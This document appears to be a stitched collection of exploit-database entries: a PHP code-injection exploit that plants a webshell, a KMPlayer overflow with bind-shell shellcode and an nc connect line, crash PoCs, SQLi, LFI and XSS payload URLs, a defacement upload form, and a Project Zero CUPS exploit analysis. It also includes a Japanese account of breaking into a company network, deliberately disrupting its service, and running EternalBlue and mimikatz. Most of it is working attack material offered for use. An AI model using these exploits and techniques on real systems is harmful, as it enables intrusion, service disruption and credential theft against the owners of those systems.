#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

source: https://www.securityfocus.com/bid/53703/info Small-Cms is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible. <?php # Author : L3b-r1'z # Title : Small Cms Php Code Injection # Date : 5/25/2012 # Email : L3b-r1z@hotmail.com # Site : Sec4Ever.Com & Exploit4Arab.Com # Google Dork : allintext: "Copyright © 2012 . Small-Cms " # -------- Put Target As site.com Just (site.com) -------- # $target = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/install.php? step=2&action=w"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "hostname=LOL%22%3B%3F%3E%3C%3Fsystem(%24_GET%5B'cmd'%5D)%3B%3F%3E%3C%3F%22LOL&username=sssss&password=sssss&database=sssss"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; # Curl By : RipS ?>

#!/usr/bin/python #[+] Author: Rajganesh (Raj) Pandurangan #[+] Exploit Title: HansoPlayer 3.4.0 Memory Corruption PoC #[+] Date: 06-17-2015 #[+] Category: DoS/PoC #[+] Tested on: WinXp/Windows 7 #[+] Vendor: http://www.hansotools.com #[+] Download: http://www.hansotools.com/downloads/hanso-player-setup.exe #[+] Sites: www.exclarus.com #[+] Twitter: @rajganeshp #[+] Thanks: offensive security (@offsectraining) print"###########################################################" print"# Title: HansoPlayer 3.4.0 Memory Corruption PoC #" print"# Author: Rajganesh Pandurangan #" print"# Category: DoS/PoC # " print"###########################################################" header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20" "\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00" "\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00" "\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00" "\x5a\x00\x2f\x00\x67\x00\x0a") exploit = header exploit += "\x41" * 900000 crash = open('crash.wav','w') crash.write(exploit) crash.close()

source: https://www.securityfocus.com/bid/53708/info Nilehoster Topics Viewer is prone to multiple SQL-injection vulnerabilities and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. Topics Viewer 2.3 is vulnerable; other versions may also be affected. http://www.example.com//search.php?q=[SQLi] http://www.example.com//lost.php/ [SQLi] http://www.example.com/footer.php? [LFI]

source: https://www.securityfocus.com/bid/53709/info Yamamah Photo Gallery is prone to an information-disclosure vulnerability. An attacker can exploit this issue to download the database that contain sensitive information. Information harvested may aid in launching further attacks. Yamamah 1.1.0 is vulnerable; other versions may also be affected. http://www.example.com/yamamah/cp/export.php

source: https://www.securityfocus.com/bid/53740/info WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application. WHMCS 5.0 is vulnerable; other versions may also be affected. http://www.example.com/cart.php?a=add&domain=transfer&n913620=v992636 http://www.example.com/domainchecker.php?search=bulkregister&n946774=v992350 http://www.example.com/cart.php?currency=2&gid=1&n972751=v976696

source: https://www.securityfocus.com/bid/53711/info WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. ######################################## # First found around September 2011~ # Kept 0day because killing bugs is cruise control for gay. # Author: dx7r # fuck off. # if you use this now, you're a moron. lots of love. ####################################### import urllib2 import urllib import os def regglobcheck(): regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test') regglob2 = urllib2.urlopen(regglob1) regglob3 = regglob2.read().count('test') if regglob3 == 0: rgen = 0 print " [+] Register Globals not enabled, no sqli on this whmcs install" elif regglob3 >= 1: rgen = 1 print " [+] Register Globals enabled, own it." regglobcheck()

Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html Abstract Modern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. Despite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation. In this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. By publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same. Summary Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code. The reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. Exploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations. Background Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158) When freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'. scheduler/ipp.c:1626: /* * Free old strings… ← Even 'old' strings need to be freed. */ for (i = 0; i < attr->num_values; i ++) { _cupsStrFree(attr->values[i].string.text); attr->values[i].string.text = NULL; if (attr->values[i].string.language) ← for all values in an attribute { _cupsStrFree(attr->values[i].string.language); ← free the 'language' string attr->values[i].string.language = NULL; } } In this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. To specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times. The over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. Dangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build. A Reflected XSS in the Web Interface (CVE-2015-1159) The template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. The template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. The code is found in 'cgi_puts()', and escapes the following reserved HTML characters: <>"'& These are replaced with their HTML entity equivalents ('<' etc...). The function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650: if (*s == '<') { /* * Pass <A HREF="url"> and </A>, otherwise quote it... */ if (!_cups_strncasecmp(s, "<A HREF=\"", 9)) { fputs("<A HREF=\"", out); s += 9; while (*s && *s != '\"') { if (*s == '&') fputs("&", out); else putc(*s, out); s ++; } if (*s) s ++; fputs("\">", out); } For variable values containing '<a href="', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing " would normally be escaped, but are echoed unaltered in this context. Note that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. Take this example from templates/help-header.tmp:19: <P CLASS="l0"><A HREF="/help/{QUERY??QUERY={QUERY}:}">All Documents</A></P> In this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href="', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. Requesting the following URI will demonstrate this reflected XSS: http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search The 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors. Upstream Fixes Apple Fix (April 16, 2015): https://support.apple.com/kb/DL1807 Official CUPS fix for downstream vendors (June 8, 2015): https://www.cups.org/str.php?L4609 http://www.cups.org/blog.php?L1082+I0+Q Project Zero Bug For those interested, the sample exploit can be found here: https://code.google.com/p/google-security-research/issues/detail?id=455 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37336.tar.gz Disclosure Timeline March 20th, 2015 - Initial notification to Apple April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3 June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3 June 18th, 2015 - Disclosure + 90 days June 19th, 2015 - P0 publication Attack Surface Reduction in CUPS 2.0.3+ CUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs: Configuration value strings are now logically separated from the string pool, allocated by strdup() instead. LD_* and DYLD_* environment variables are blocked when CUPS is running as root. The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only). Acknowledgements Thanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits. Conclusion No one prints anything anymore anyways.

source: https://www.securityfocus.com/bid/53740/info WHMCS is prone to a cross-site scripting vulnerability and multiple HTML-parameter-pollution vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the page is rendered to the user, and override existing hard-coded HTTP parameters which compromises the application. WHMCS 5.0 is vulnerable; other versions may also be affected. http://www.example.com/knowledgebase.php?action = [XSS]

source: https://www.securityfocus.com/bid/53759/info VoipNow Professional is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. VoipNow Professional 2.5.3 is vulnerable; other versions may also be vulnerable. http://www.example.com/index.php?nsextt=[xss]

source: https://www.securityfocus.com/bid/53761/info TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected. <form action='http://www.example.com/inc/functions.php?view=admin&do=pages&create=new&save=1' method='post'> <strong>Page Title :</strong> <input type="text" name="title" size="50" value='Happy Milw0rm 1337day !'> <textarea id="elm1" name="page"> <center> <h1> HaCked By KedAns-Dz </h1> <h2> Happy Milw0rm 1337-Day All Hax0rS ^.^ </h2> <h3> Greetings t0 KeyStr0ke + JF and All 0ld School ( The Milw0rm ) </h3> </center> &lt;/textarea&gt; <input type='submit' value='Upload Page'> </form>

source: https://www.securityfocus.com/bid/53761/info TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected. <form action='http://www.example.com/admin/admin.php?view=admin&do=../../../../[ LFI ]%00' method='post'> <input type='submit' value='Get/Include Local File'> </form>

source: https://www.securityfocus.com/bid/53761/info TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. TinyCMS 1.3 is vulnerable; other versions may also be affected. <form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'> <input type='submit' value='Get/Include Local File'> </form>

0x01はじめに エンタープライズがTencent CloudやAlibaba Cloudなどのパブリッククラウドにビジネスを置いている場合、エンタープライズのイントラネットに接続されていません。これは論理的分離に相当します（非物理的分離）。エンタープライズの情報セキュリティが比較的優れており、VPNアドレスまたはルーターまたはファイアウォールサービスを公開しない場合、情報を収集する際にエンタープライズのイントラネットが使用するパブリックネットワークアドレスを正確に見つけることは困難です。現時点では、イントラネットを貫通することは比較的困難です。 パブリッククラウドから浸透、ローミングのためにイントラネットに実際の浸透プロセスを紹介します。 0x02アーリーハンド クラウドサーバーを取得する方法はこの記事の焦点ではないため、詳細に紹介するのではなく、アイデアを簡単に紹介するだけです。 会社名によると、Baiduで直接、公式のWebサイトの住所を発見してください。公式ウェブサイトの住所によると、情報収集の波が実行されました。 このサイトは、TencentクラウドホストであるCDNを使用し、IPが変更され、実際のIPを検出できないことがわかりました。コマンド実行の脆弱性があることがわかりました。直接RCEし、サーバーの権限を取得します。最初にIPアドレスを見てください は、イントラネットアドレスが表示されていることを発見しました。現時点では、実際のIPを確認しますが、これはその後のイントラネットの浸透には役に立たない。 のみ、それがテンセントクラウドであり、ホストがイントラネットにないことがわかりました。 0x03イントラネットを押す方法を見つけましょう 現時点では、会社のオフィスネットワークの外部ネットワークIPを取得する必要があります。この外部ネットワークIPは、ファイアウォールまたはルーターのいずれかです。それを手に入れる方法は？私は解決策を思いつきました。一般に、クラウドホスト、運用、メンテナンス担当者は、SSHを通じてそれらを管理します。一般的に、労働時間中に、彼らは接続し、この時点で会社の実際のパブリックネットワークIPを取得します。 ちょっとしたトリックを教えてください。それが小さな会社の場合、10日間または半月の間、運用とメンテナンスが接続されない場合があります。現時点では、「小さなダメージ」を行い、操作とメンテナンスをオンラインで強制することができます。 たとえば、Webサービスなどを閉じるときは、2つのポイントに注意を払ってください。操作とメンテナンスによってハッキングされていることがわからないように、あまり行動しないでください。もちろん、事前にアクセス許可を維持できるので、ここでは紹介しません。 「承認」がない場合は、周りを台無しにしないでください。承認がない場合は、周りを台無しにしないでください。許可がない場合は、周りを台無しにしないでください。そうしないと、無料の食事をするために局に行きます。なぜ違法なことができないのですか？ハハ。操作とメンテナンスがオンラインであるかどうかを見てみましょう：[root@vm-0-13-centos〜] ＃netstat -lantp | GREPはを確立しました。SSHDプロセスに焦点を当てています。この以前のパブリックネットワークIPは、運用とメンテナンスが配置されている会社のパブリックネットワークIPです。私はそれらのうちの2つをここで見つけました。 0x04上記のIPの浸透 同じ退屈なものの波を取り、情報を収集しましょう。 Shiroが発行したシリアル化の脆弱性が発見され、シェルが直接反発されました。 が直接入りました：イントラネットアドレスを見てください：イントラネットアドレスは10.10.10.187 0x05幸せなイントラネットローミング FRP+プロキシファイアエージェントが構築されています。ここで詳細に構築する方法を紹介しません。自分でグーグルで検索できます。とても簡単です。 Socks5プロキシになり、AVトラフィックの検出を避けるために暗号化することが最善です。また、プロキシのパスワードを追加して、「他の人」が使用されないようにするのが最善です。ここでFRPの変更されたバージョンを使用して、構成ファイルをリモートでロードする方法を使用して、少し回避し、トレーサビリティの難易度を少し増やしました。 エージェントが構築されました。次に、イントラネットをスキャンして確認してください：には古典的なMS17-010の脆弱性がありますが、実際、他の多くの脆弱性が見つかりました。最善のMS17-010を迅速に開始しましょう。これはWindows Serverであり、優れた利用値を持っています。それを使用した後、サーバーを使用して別のエージェントのレイヤーになります。 RDPでさえ、戦闘とシャトルをすぐに終わらせることができます。私のMSFはパブリックネットワークです。プロキシチャインを使用して、プロキシと攻撃を直接使用しています。 攻撃を開始する：さらに数回実行します。攻撃は成功しました（この写真は後で追加され、情報は一貫性がないかもしれませんが、原則は同じです）。 権限がシステムの最も高い許可であることを確認しましょう。そうすれば、電力の上昇を排除できます。 ミミカッツを使用してパスワードをつかむ：管理者のパスワードを取得し、3389を開いていることを見つけ、プロキシ を介してプロキシは、現地の認証を使用できます。 Qunhui NASも発見されました 3 vcenters、非常に多くの仮想マシンがあります。私はそれを簡単に見て、何百もいました。すべてを引き継ぐことができます 0x06要約 1。ターゲット会社の名前を検索し、会社の公式ウェブサイトの住所を照会し、情報を収集することにより。送信メッセージの対応するIPにはCDNサービスが含まれており、会社の実際の住所は取得できません。会社のサブドメイン名にリモートコマンド実行の脆弱性があるため、サーバーの許可が取得されます。 2。アイスサソリを介したリモート接続とコマンドを実行して、IPアドレス（ifconfig）を照会します。 IPアドレスはすべてイントラネットアドレスとパブリックネットワークアドレスであることがわかります。パブリックネットワークアドレスを照会しますが、それでもTencent Cloud IP3です。ターゲット企業の出口パブリックネットワークアドレスを取得する必要があります。ここでは、ターゲットサイトがWebサービスのダウンタイムと異常を実行できるようにすることができます（サービスの閉鎖や異常なWebサービストラフィックの原因など）、操作およびメンテナンス担当者がFortress Machineにログインし、Tencent CloudホストにログインしてWebサービスを表示します。 4。この時点で、ネットワーク接続を確認し、ターゲット企業のエクスポートパブリックネットワークアドレスNetStat -LANTP | GREPは確立されています5。 Through information collection, you will find that the target company's public IP port is out of a certain port, and there is a shiro deserialization vulnerability 6. Run the command to view the IP address, and find that the target is the intranet address :10.10.10.187, and test whether it is connected to the external network ping. www.baidu.com10。 Socks5プロキシは、FRP+プロキシフィーターまたはプロキシチェインを介して実行されます。ここでは、FRPのパスワードと単純な暗号化を設定する必要があります。 12。Proxifierを介してFSCANをロードして、ターゲットイントラネットをスキャンし、10.10.10.105にMS17-01013があることを見つけます。プロキシチャインを介してMSFをロードして実行し、MS17-010モジュールを使用して攻撃し、MimikatzはMSFUSE Exploit/Windows/SMB/MS17_010_ETERNALBLUEMSFSET RHOSTS 10.10.10.10.10.105MSFRUNMETERPTERGETUID //を取得します。 mimikatzmeterpretercreds_wdigest //ハッシュ値14を取得します。管理者のパスワードを取得し、3389を開いたことがわかりました。プロキシファイヤーSocks5プロキシに直接移動してリモートデスクトップ15にログインしました。システムに入ると、仮想マシンがあることがわかりました。仮想マシンでローカル認証が使用されました。仮想マシンにログインした後、私はそれがQunhui NAS16であることがわかりました。 Qunhui NasにはVMwareがあります。 vSphere、3つのvcentersオリジナルリンクがあります： https://mp.weixin.qqc.com/s?__biz=mzg4ntuwmzm1ng==mid=22474929554Idx=1Sn=412BBB64E880E6F6F63BA3AE05B2129EB0CHKSM=CFA5414 9F8D2C85F3145E011EDF2EC5B05B2D0614B0408D48D48EA8DAA03087037228502C1686SCENE=178CUR_ALBUM_ID=1553386251775492092098＃RD

#!/usr/bin/env python # Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0 # Date: 2015-06-20 # Exploit Author: HexTitan # Vendor Homepage: http://www.seagate.com/ # Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/ # Version: 4.0.21.0 # Tested on: Windows 8.1 32bit # #Description: # #The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch. # #PoC: # #The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process. # # #Solution: # #Until a fix is available, firewall the Dashboard.exe process. import socket import sys import os target = '[ip]' port = [port] buffer = 'A'*3100 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect((target, port)) print '[*] Connected to ' + target except: print '[-] Unable to connect to ' + target sys.exit(0) s.send(buffer) print '[!] Malformed request sent\n' s.close()

#!/usr/bin/python # # KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass) # # Author: Naser Farhadi # # Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit) # # Usage: # chmod +x KMPlayer.py # python KMPlayer.py # Alt+c | Video Capture | Alt+a | Audio Capture # paste content of KMPlayer.txt into Filename # nc 172.20.10.14 333 # # Video: http://youtu.be/9gtZxR2ioTM ## buffer = ( "\x50" # PUSH EAX "\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL "\x5c" # POP ESP "\x40" # Venetian Padding => ADD BYTE PTR DS:[EAX],AL "\x61" # POPAD "\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL ""+("\x5f\x45" * 125)+"" # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125 "\x54" # PUSH ESP "\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL "\x45" # Padding => INC EBP "\x45" # Venetian Padding => ADD BYTE PTR SS:[EBP],AL "\x61" # POPAD "\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77" # POP EBP/RETN from KMPlayer.exe "\x58" # POP EAX "\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77" # POP EBP/RETN from KMPlayer.exe "\x58" # POP EAX "\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x33\x77" # POP EBP/RETN from KMPlayer.exe "\x5d" # POP EBP "\x47" # Venetian Padding => ADD BYTE PTR DS:[EDI],AL "\x71" # Padding => JNO SHORT 0x2 "\x71" # Venetian Padding => ADD BYTE PTR DS:[ECX],DH ) # msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41" "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68" "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49" "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a" "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39" "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39" "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b" "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b" "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66" "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c" "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72" "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e" "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48" "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a" "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b" "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76" "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45" "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33" "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63" "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59" "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59" "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31" "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b" "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49" "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74" "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37" "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34" "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46" "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30" "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77" "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71" "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51" "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37" "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f" "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55" "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69" "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39" "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e" "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44" "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c" "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46" "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71" "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45" "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63" "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b" "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65" "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a" "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a" "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45" "\x41\x41") buffer += shellcode + "\x71" * (1534 - len(shellcode)) open("KMPlayer.txt", "wb").write(buffer)

##################################################################################### Application: Adobe Photoshop CC 2014 & Bridge CC 2014 Platforms: Windows Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014. Secunia: {PRL}: 2015-07 Author: Francis Provencher (Protek Research Lab’s) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X. Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshop’s featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features. (https://en.wikipedia.org/wiki/Adobe_Photoshop) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-03-15: Francis Provencher from Protek Research Lab’s found the issue; 2015-03-19: Francis Provencher From Protek Research Lab’s report vulnerability to PSIRT; 2015-05-16: Adobe release a patch (APSB15-12) ##################################################################################### ============================ 3) Technical details ============================ An error in the the GIF parser, could lead to a memory corruption when processing a crafted GIF image with an invalid value in the “ImageLeftPosition” into the “ImageDescriptor”. Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file. ##################################################################################### =========== 4) POC =========== http://protekresearchlab.com/exploits/PRL-2015-07.gif https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37347.gif ###############################################################################